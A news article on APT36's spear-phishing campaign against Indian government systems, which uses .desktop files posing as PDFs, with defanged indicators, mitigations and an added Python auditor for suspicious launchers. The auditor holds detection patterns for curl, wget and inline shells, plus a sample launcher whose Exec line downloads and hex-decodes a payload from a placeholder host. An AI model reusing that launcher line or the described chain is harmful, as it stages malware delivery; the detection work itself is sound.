September 18, 2025
NationNews

Indian Government Systems Under Attack: Hackers Deploy Fake Shortcut Files

In a concerning turn of events, Indian government systems are facing renewed cyber threats as the notorious hacker group Transparent Tribe (APT36) leverages deceptive tactics to break into official networks. The group has deployed weaponized shortcut files that masquerade as legitimate PDF documents, targeting both Windows and BOSS (Bharat Operating System Solutions) Linux systems.
Attack Strategy and Execution
According to security firm CYFIRMA, the campaign begins with spear-phishing emails that appear to contain meeting notices. These emails carry seemingly innocuous files such as “Meeting_Ltr_ID1543ops.pdf.desktop”. Once opened, these files execute a shell script that:
Downloads a hex-encoded ELF binary from an attacker-controlled server (e.g., securestore[.]cv),
Executes the binary,
Opens a decoy PDF (often via Firefox) to mislead the user, while the real malware operates stealthily in the background.
The malicious payload then communicates with a hardcoded command-and-control server (modgovindia[.]space:4000) to receive commands and exfiltrate data. Moreover, persistence is established via a cron job, ensuring the malware remains active even after reboot or termination.
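As an added example (not from CYFIRMA's report or the original article), the following Python check audits a `.desktop` launcher for the traits described above: a document extension hidden before `.desktop`, and an `Exec=` line that invokes an inline shell, a downloader, or hex decoding. The extension list, the rule patterns, and both sample entries are constructed assumptions.

```python
import re
from pathlib import PurePosixPath

# Document-style extensions that should never precede ".desktop" (assumed list).
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
# Heuristic patterns for the Exec= value (assumptions; tune per environment).
EXEC_RULES = {
    "shell-inline": re.compile(r"\b(?:ba|da|z)?sh\s+-c\b"),
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "hex-decode": re.compile(r"\bxxd\s+-r\b"),
}

def parse_desktop_entry(text):
    """Return key/value pairs from the [Desktop Entry] group only."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry

def audit_launcher(filename, text):
    """List the reasons a .desktop launcher looks like a disguised document."""
    findings = []
    suffixes = [s.lower() for s in PurePosixPath(filename).suffixes]
    if len(suffixes) >= 2 and suffixes[-1] == ".desktop" and suffixes[-2] in DOC_EXTS:
        findings.append("double-extension")
    exec_value = parse_desktop_entry(text).get("Exec", "")
    findings += [name for name, rx in EXEC_RULES.items() if rx.search(exec_value)]
    return findings

# Constructed samples (not taken from the campaign); the host is a placeholder.
SUSPECT = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Exec=bash -c "curl -s https://placeholder.invalid/blob | xxd -r -p > /tmp/blob.bin; firefox /tmp/notice.pdf"
Icon=application-pdf
"""
BENIGN = "[Desktop Entry]\nType=Application\nName=Files\nExec=nautilus %U\n"

if __name__ == "__main__":
    print(audit_launcher("Meeting_Ltr_ID1543ops.pdf.desktop", SUSPECT))
    print(audit_launcher("org.gnome.Nautilus.desktop", BENIGN))
```

Run it over mail attachment stores and user download directories; any launcher returning a non-empty list deserves manual review before it is opened.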
Broader Impact and Technical Sophistication
APT36’s tactics extend beyond Linux. The group also targets Windows systems with tailored shortcut techniques, alongside deploying remote access tools and backdoors like Poseidon. These enable credential harvesting, data exfiltration, and long-term access across compromised environments.
Additional analysis by cybersecurity firms such as Hunt.io and CloudSEK highlights that the malware incorporates anti-debug and anti-sandbox mechanisms designed to evade detection by automated security tools.
Persistent Threat from APT36
Transparent Tribe, operational since at least 2013, is widely attributed to Pakistani origin and is known for its long history of cyber-espionage against Indian government institutions, especially in defense sectors (GovInfoSecurity, SecurityWeek). The group’s evolving methods underscore a growing threat to national digital infrastructure.
What This Means for Indian Cybersecurity
The use of fake shortcut files underlines a critical vulnerability—social engineering remains a potent vector. As a countermeasure, security experts recommend:
Disabling auto-execution of desktop shortcuts and implementing application allow-lists on BOSS Linux images.
Enforcing read-only modes for documents and isolating downloads from untrusted networks.
Adopting zero-trust segmentation to limit lateral movement in compromised environments.